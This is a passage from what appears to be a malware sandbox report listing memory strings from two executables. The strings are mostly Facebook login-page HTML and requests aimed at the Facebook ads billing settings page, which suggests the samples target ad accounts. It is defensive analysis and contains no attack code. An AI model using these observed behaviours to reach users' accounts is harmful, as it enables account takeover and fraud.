nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaB862DED} equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaB862DED}tqX5tk11V/C3f@ equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605696603.0000000002916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</titl equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https:/ equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content=" equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr4xk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-WnQ","isCQuick":false});</script><script nonce="f5jFR5CM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="f5jFR5CM"></style><script nonce="f5jFR5CM">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content=" equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/XznY7q1olI3.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TGesA0a" /> equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=httpsh equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="x46HV0G8">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrmnc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-zzY","isCQuick":false});</script><script nonce="x46HV0G8">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="x46HV0G8"></style><script nonce="x46HV0G8">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content=" equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.facebook.comCwb equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Alt-Svch3=":443"; ma=86400Priorityu=3,iX-FB-Debug9W9q7O9cwERD9yl452YLI7TlpCnSPnMmbzzsHrk1MAGejrWauIysSASFTboY1ZVsRl5CUepLa/i5ffzTF4uR5Q==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupsdocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0cross-origin-embedder-policy-report-onlyrequire-corp;report-to="coep_report"report-to{"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:46:39 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control6 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.com equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.comc equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.comc+07 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hwww.facebook.com/ads/manager/account_settings/account_billingalue132sames equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Kwww.facebook.com equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: LAlt-Svch3=":443"; ma=86400X-FB-Debug0vm/8I8SNdKVTJ8OyhzeiB5vOfSY+MSlVEdgCkfZyMmm399tNBJDn3byMN/GMHQLmPYx8pSyQN/MPJrxK+S1Og==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:45:36 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.000000000047C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Lwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Lwww.facebook.comH equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.492565099.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Lwww.facebook.comHTEP equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PE)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Qwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Rwww.facebook.comx equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Twww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70star-mini.c10r.facebook.comwww.facebook.comll equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Uwww.facebook.com equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Uwww.facebook.comA equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: WAdelay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{ equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wwww.facebook.com equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ad><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr4xk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-WnQ","isCQuick":false});</script><script nonce="f5jFR5CM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="f5jFR5CM"></style><script nonce="f5jFR5CM">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, 